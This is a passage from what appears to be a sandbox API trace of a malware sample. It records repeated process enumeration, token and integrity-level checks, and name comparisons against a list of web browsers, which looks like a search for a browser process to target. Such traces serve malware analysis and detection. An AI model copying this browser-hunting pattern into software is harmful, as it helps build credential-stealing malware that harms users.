nSubAuthority=0x0) returned 0x41b198 [0551.072] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0551.072] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0551.072] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0551.072] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0551.072] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0551.072] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0551.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0551.073] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0551.073] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0551.073] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0551.073] GetLastError () returned 0x7a [0551.073] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0551.073] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0551.073] CloseHandle (hObject=0x29c) returned 1 [0551.073] CloseHandle (hObject=0x298) returned 1 [0551.074] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0551.074] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0551.074] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0551.074] GetLastError () returned 0x7a [0551.074] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0551.074] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0551.074] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0551.074] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0551.074] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0551.075] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0551.075] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0551.075] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0551.075] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0551.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0551.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0551.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0551.075] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0551.075] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0551.075] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0551.075] GetLastError () returned 0x7a [0551.076] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0551.076] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0551.076] CloseHandle (hObject=0x29c) returned 1 [0551.076] CloseHandle (hObject=0x298) returned 1 [0551.076] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0551.076] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0551.076] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0551.076] GetLastError () returned 0x7a [0551.077] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0551.077] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0551.077] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0551.077] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0551.077] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0551.077] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0551.077] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0551.078] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0551.078] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0551.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0551.078] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0551.078] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0551.079] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0553.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa2c8) returned 0xc0000004 [0553.090] VirtualAlloc (lpAddress=0x0, dwSize=0xb2c8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0553.091] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb2c8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0553.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0553.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0553.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0553.092] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0553.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0553.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0553.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0553.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0553.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0553.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0553.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0553.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0553.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0553.093] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0553.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0553.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0553.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0553.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0553.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0553.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0553.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x298 [0553.094] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0553.094] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0553.095] GetLastError () returned 0x7a [0553.095] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0553.095] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0553.095] CloseHandle (hObject=0x29c) returned 1 [0553.095] CloseHandle (hObject=0x298) returned 1 [0553.095] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0553.095] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0553.095] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0553.096] GetLastError () returned 0x7a [0553.096] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0553.096] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0553.096] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0553.096] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0553.096] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0553.096] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0553.096] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0553.096] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0553.096] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0553.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0553.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x298 [0553.097] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0553.097] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0553.097] GetLastError () returned 0x7a [0553.097] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0553.097] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0553.097] CloseHandle (hObject=0x29c) returned 1 [0553.097] CloseHandle (hObject=0x298) returned 1 [0553.098] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0553.098] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0553.098] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0553.098] GetLastError () returned 0x7a [0553.098] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0553.098] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0553.098] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0553.098] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0553.098] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0553.099] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0553.099] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0553.099] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0553.099] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0553.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x298 [0553.099] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0553.099] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0553.099] GetLastError () returned 0x7a [0553.099] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0553.099] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0553.100] CloseHandle (hObject=0x29c) returned 1 [0553.100] CloseHandle (hObject=0x298) returned 1 [0553.100] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0553.100] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0553.100] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0553.100] GetLastError () returned 0x7a [0553.100] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0553.100] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0553.100] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0553.101] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0553.101] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0553.101] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0553.101] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0553.101] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0553.101] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0553.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0553.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x298 [0553.101] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0553.101] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0553.101] GetLastError () returned 0x7a [0553.102] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0553.102] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0553.102] CloseHandle (hObject=0x29c) returned 1 [0553.102] CloseHandle (hObject=0x298) returned 1 [0553.102] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0553.102] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0553.102] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0553.102] GetLastError () returned 0x7a [0553.103] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0553.103] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0553.103] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0553.103] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0553.103] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0553.103] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0553.103] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0553.103] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0553.103] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0553.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0553.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0553.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0553.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x298 [0553.104] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x29c) returned 1 [0553.104] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0553.104] GetLastError () returned 0x7a [0553.104] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x1, TokenInformation=0x40fe68, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe68, ReturnLength=0x20f7ac) returned 1 [0553.104] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0553.104] CloseHandle (hObject=0x29c) returned 1 [0553.104] CloseHandle (hObject=0x298) returned 1 [0553.105] GetLengthSid (pSid=0x40fe70*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0553.105] OpenProcessToken (in: ProcessHandle=0x298, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x29c) returned 1 [0553.105] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0553.105] GetLastError () returned 0x7a [0553.105] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x19, TokenInformation=0x41b188, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b188, ReturnLength=0x20f7d8) returned 1 [0553.105] GetSidSubAuthorityCount (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b191 [0553.105] GetSidSubAuthority (pSid=0x41b190*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b198 [0553.105] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0553.106] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0553.106] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0553.106] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0553.106] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0553.106] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0553.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0553.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0553.106] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0553.107] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0555.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa2c8) returned 0xc0000004 [0555.118] VirtualAlloc (lpAddress=0x0, dwSize=0xb2c8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0555.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb2c8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0555.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0555.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0555.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0555.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0555.118] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0555.119] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0555.119] OpenProcess 